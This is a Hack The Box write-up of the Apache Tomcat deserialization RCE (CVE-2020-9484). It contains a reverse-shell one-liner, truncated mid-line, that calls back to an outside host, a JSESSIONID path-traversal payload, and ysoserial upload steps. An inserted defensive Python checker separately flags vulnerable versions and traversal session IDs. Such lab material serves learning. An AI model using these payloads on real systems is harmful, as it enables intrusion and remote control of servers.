Apache Tomcat RCE Deserialization (CVE-2020-9484)

Hi Guys,

I want to share a tutorial on the Apache Tomcat vulnerability CVE-2020-9484, based on the experience gathered from the Hack The Box machine Feline.

This vulnerability affects the Tomcat versions below; all versions before April 2020 are impacted:

1. Apache Tomcat 10.x < 10.0.0-M5
2. Apache Tomcat 9.x < 9.0.35
3. Apache Tomcat 8.x < 8.5.55
4. Apache Tomcat 7.x < 7.0.104

To exploit this vulnerability, the following prerequisites must be met:

1. The PersistentManager is enabled, and it’s using a FileStore
2. The attacker can upload a file with arbitrary content, has control over the filename, and knows the location where it is uploaded
3. There are gadgets in the classpath that can be used for a Java deserialization attack

The vulnerability

1. Tomcat requests the Manager to check if a session with session ID “../../../../../../tmp/12345” exists
2. It will first check if it has that session in memory.
3. It does not. But the currently running Manager is a PersistentManager, so it will also check if it has the session on disk.
4. It will check at location directory + sessionid + ".session", which evaluates to “./session/../../../../../../tmp/12345.session”
5. If the file exists, it will deserialize it and parse the session information from it
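The lookup described above can be turned into a defensive check. The following is an added example, not code from the original post or from Tomcat: it tests a version string against the fixed releases listed earlier and flags JSESSIONID values that would resolve outside the session store. The function names, the `./session` store directory and the sample request lines are assumptions constructed for illustration.

```python
import posixpath
import re

# First fixed release per branch, taken from the version list above.
FIXED = {10: "10.0.0-M5", 9: "9.0.35", 8: "8.5.55", 7: "7.0.104"}

def _key(version):
    # "10.0.0-M5" -> (10, 0, 0, 5); a final release sorts after its milestones.
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-M(\d+))?", version)
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    major, minor, patch, milestone = m.groups()
    return (int(major), int(minor), int(patch), int(milestone or 10**6))

def is_affected(version):
    """True if the version is below the fixed release of its branch."""
    key = _key(version)
    fixed = FIXED.get(key[0])
    return fixed is not None and key < _key(fixed)

def session_file(store_dir, session_id):
    # The lookup described above: directory + sessionid + ".session"
    return posixpath.normpath(posixpath.join(store_dir, session_id + ".session"))

def escapes_store(store_dir, session_id):
    """True if the resolved session file is not directly inside store_dir."""
    store = posixpath.normpath(store_dir)
    return posixpath.dirname(session_file(store, session_id)) != store

COOKIE_RE = re.compile(r"JSESSIONID=([^;\s]+)")

def suspicious_session_ids(lines, store_dir="./session"):
    """Return JSESSIONID values that would resolve outside the session store."""
    hits = []
    for line in lines:
        for sid in COOKIE_RE.findall(line):
            if "\\" in sid or escapes_store(store_dir, sid):
                hits.append(sid)
    return hits

# Constructed request-header lines (not real traffic).
SAMPLE = [
    "GET /index.jsp HTTP/1.1 | Cookie: JSESSIONID=5F4DCC3B5AA765D61D8327DEB882CF99",
    "GET /index.jsp HTTP/1.1 | Cookie: lang=en; JSESSIONID=../../../../../../tmp/12345",
]

if __name__ == "__main__":
    for v in ("9.0.27", "9.0.35", "10.0.0-M4"):
        print(v, "affected" if is_affected(v) else "not affected by this list")
    print(suspicious_session_ids(SAMPLE))
```

A session ID should never contain a path separator, so any hit from `suspicious_session_ids` is worth investigating regardless of the Tomcat version in use.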

Below is the enumeration result: the server error message shows that the server is using Apache Commons FileUpload.

Let’s analyze the error that leaked the file path when we uploaded a file to the server through the application.

To exploit the vulnerability, we need to take the actions below. Here we are trying to create a reverse shell.

We need to create a shell.sh file to be uploaded to the server:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.42",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fi>

1. Generate the serialized object file using ysoserial. With the command below, the file is transferred from the attacker machine and copied to /dev/shm/

2. The next step is to upload the file to the server. We can use the functionality from the application.

3. The last step is to run the uploaded file using the JSESSIONID. You need to set the JSESSIONID to the path of the file location, without the .session extension.

4. Now shell.sh has been uploaded to the server.

5. Now we need to create a serialized object that executes the shell.sh that has been uploaded to /dev/shm.

6. We need to upload the session file to the server so that it can be loaded by Java.

7. We execute it again with the same mechanism as in point no. 3.

Don’t forget: before you execute point no. 7, you need to start your netcat listener to catch the reverse connection from the victim.

Resource: https://www.redtimmy.com/apache-tomcat-rce-by-deserialization-cve-2020-9484-write-up-and-exploit/
